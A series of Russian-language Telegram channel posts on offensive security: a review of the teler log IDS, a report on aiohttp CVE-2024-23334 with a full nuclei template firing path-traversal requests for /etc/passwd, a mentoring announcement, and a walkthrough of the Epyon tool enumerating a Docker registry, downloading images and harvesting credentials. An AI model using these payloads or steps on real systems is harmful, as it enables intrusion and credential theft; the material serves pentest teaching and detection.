🐈 Не так давно был проект по incident response. И как обычно сроки = "надо было ещё 2 дня назад". Надо было разбирать 50 гб логов. Да, кто-то скажет, что это ещё мало. Но когда первый раз такой проект, а ты вообще пентестер, задача специфичная. Жаль, что только сейчас, но всё же нашёл удобный инструмент для анализа логов.
#red_team

Важной фичей является не только цветной вывод, что упрощает визуальный просмотр логов. Но он ещё парсит и сразу размечает, что это была за атака, к примеру перебор директорий, краулеры, веб атаки (не различает конкретно XSS, SQLi), но по контексту и запросу легко можно понять, что за атака.

➡️ Утилита teler

Использование:

cat /var/log/nginx/access.log | teler

или

teler -i /var/log/nginx/access.log

Разницы в использовании нет, но думаю на чересчур большом логе, чтение из самого teler будет производительнее

📌 Но по сути это не инструмент для парсинга логов, это IDS (Intrusion Detection System).
➡️ Также от этих же разработчиков есть подобие WAF - teler-waf.

Утилиты написаны на 👣

🌚 @poxek

🔓 Уязвимость в библиотеке aiohttp уже привлекла внимание хакеров 🔓
#CVE #python #red_team

Исследователи предупреждают, что недавно исправленная уязвимость в Python-библиотеке aiohttp (CVE-2024-23334) уже взята на вооружение хакерами, включая вымогательские группировки, такие как ShadowSyndicate.

Aiohttp — это опенсорсная библиотека, построенная на основе I/O фреймворка Asyncio и предназначенная для обработки большого количества одновременных HTTP-запросов без традиционного потокового нетворкинга. Aiohttp часто используется технологическими компаниями, веб-разработчиками, бэкенд-инженерами и специалистами по анализу данных для создания высокопроизводительных веб-приложений и сервисов, объединяющих данные из множества внешних API.

❤️ Шаблон для nuclei

id: "aiohttp"

info:
  name: aiohttp LFI
  author: crth0
  severity: high
  description: CVE-2024-23334 Check LFI.
  reference:
    - https://github.com/jhonnybonny
  classification:
  tags: aiohttp,LFI,CVE-2024-23334


http:
  - method: GET
    path:
      - '{{BaseURL}}/static/../etc/passwd'
      - '{{BaseURL}}/static/../../etc/passwd'
      - '{{BaseURL}}/static/../../../etc/passwd'
      - '{{BaseURL}}/static/../../../../etc/passwd'
      - '{{BaseURL}}/static/../../../../../etc/passwd'
      - '{{BaseURL}}/static/../../../../../../etc/passwd'
      - '{{BaseURL}}/static/../../../../../../../etc/passwd'
      - '{{BaseURL}}/static/../../../../../../../../etc/passwd'
    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "root:")'
        condition: and

по сути даже шаблона не нужно, тут обычный path traversal

🔓 Читать далее

❤️ PoC

🌚 @poxek

👍 Тэк, есть 2 новости. Плохая и хорошая. Выпьем за хорошую и закусим плохой.
#AMA #менторство

Хорошая новость в том, что у меня всё таки дотянулись руки доделать монтаж по AMA эфиру. Давно обещал, но только вот сделал. В телегу нативно выложить не смог, т.к. запись эфира весит 12 гб (2 часа 5 минут). И дабы не было проблем с авторскими правами на музыку из Яндекс Музыки решил на стриминговые площадки не заливать. На будущее учту это. Поэтому залил туда, где качество не зашакалиться при скачивании:

➡️ Скачать/посмотреть эфир

Плохая новость касается набора на менторство, заявок поступило более 50!! мы не ожидали, что будет столько желающих. Выбрали самых интересных на основе того, что вы писали в заявках. К сожалению многие по итогу сливались из-за того, что были не готовы платить приемлемые деньги за полугодовое обучение. Поэтому для тех, кто ещё думает или копит чеканные монеты будет следующий продут от меня через полгода +-. Так что ждите анонсов. Вчера был первый урок по менторству, полёт отличный 😏

📌 Stay tuned!

🔺 Ускоряем пентест CI/CD

Пост должен был выйти чуть позже, но увидев, что скоро начнется соревнование для попадания на Standoff 13 👨‍💻 я решил выпустить его чуть раньше. Он может вам пригодиться, особенно, если оценивать прошлый год.

В последние годы пентестеры все больше обращают внимание на присутствие платформ DevOps, а уже и DevSecOps. Эти экосистемы состоят из различных сервисов, используемых в конвейерах CI/CD, включая:

🔵 Репозитории исходного кода (Gitlab, Gitea)

🔵 Реестры контейнеров (Docker Registry, Sonatype Nexus, JFrog)

🔵 Серверы автоматизации (Gitlab-CI, Jenkins)

🔵 Инструменты для обеспечения качества и безопасности кода (много об этом говорили).

⏱ Перспективы копать именно под CI/CD: Возможности и проблемы

Для злоумышленников и пентестеров экосистема CI/CD представляет собой "обоюдоострый меч" — богатство информации и потенциальные точки входа. Слияние множества сервисов, от репозиториев до серверов автоматизации, хранит в себе кучу данных, включая исходный код, образы контейнеров и различные учетные данные 🌐. Такая среда облегчает горизонтальное перемещение, а скомпрометированные API-токены открывают путь для дальнейшей эксплуатации.

Мой личный опыт работы показывает, что компрометация облачных сервисов через CI/CD — это быстрый путь к эскалации. (привет уязвимостям в GitLab 🤗)

📕

Пример таких уязвимостей:

CVE-2022-2185 — ТЫК
CVE-2021-22205 — ТЫК
CVE-2023-5009 — ТЫК
CVE-2023-7028 — ТЫК
CVE-2024-0402 — ТЫК

Но тут возникают сложности... множество целей в экосистеме CI/CD, зависимость от официальных API для атак и огромный объем данных требуют стратегического и автоматизированного подхода.

😜 Виновник поста или швейцарский нож для тестирования на проникновение в CI/CD

💻 Сразу ссылка на инструмент — ТЫК

Epyon был представлен в 2022 году как универсальный инструмент для работы пентестеров в экосистемах CI/CD. Разработанный на языке 💻, включает в себя ряд модулей, предназначенных для взаимодействия с распространенными системами DevOps, и легко интегрируется с такими инструментами, как Gitleaks и TruffleHog, для улучшения разведки и эксплуатации (именно этим мне он и понравился).

Модули Epyon охватывают широкий спектр, включая:

1. Gitlab
2. Github
3. Jenkins
4. Azure DevOps
5. Sonatype Nexus
6. Docker Registry
7. Sonarqube
8. Gitea
9. Artifactory
10. Terraform Cloud/Enterprise

✏️ Перейдем к тестам

Я протестировал его в своей домашней лаборатории, изучив модули Gitlab(community), Jenkins, Nexus(community) и Docker Registry (про него и поговорим).

Изначально хотел проверить на Gitlab, но столкнулся с проблемой. У меня слишком много проектов, которые пришлось бы скрывать, чтобы не показывать спойлеры для будущих проектов и стратап-идей.

Пример: HTTP API Docker Registry.

Команда epyon registry может быть использована для взаимодействия с реестром Docker:

Epyon позволяет пользователям легко взаимодействовать с API реестра и получать информацию о нескольких образах контейнеров. Следующий список показывает шаги, которые были выполнены в этом примере:

⏩ Шаг 01: Получить список образов

Опция list-images может быть использована для перечисления всех образов контейнеров.

⏩ Шаг 02: Получить теги для каждого образа

Опция list-tags получит все доступные теги для каждого образа.

⏩ Шаг 03: Скачать образы контейнеров

Опция download-images загрузит и извлечет содержимое образа (загруженные файлы будут помещены в каталог, указанный в файле config.yaml).

⏩ Шаг 04: Поиск учетных данных

Недавно в каком-то из чатов спрашивали про поиск учеток в докере. Так вот, как там и ответил, я буду использовать Trufflehog.

🥂 Profit

Вот нами уже и найдены login/pass, api key и много других критически важных артефактов

🛡 Заключение

В нашем деле важно уметь сокращать время, затрачиваемое на выполнение рутинных задач. И данный инструмент с этим справляется как нельзя кстати. Из минусов хочу отметить отсутствие тонкой настройки работы через конфиг, хотя сделать это через библиотеку go viper достаточно просто.

#redteam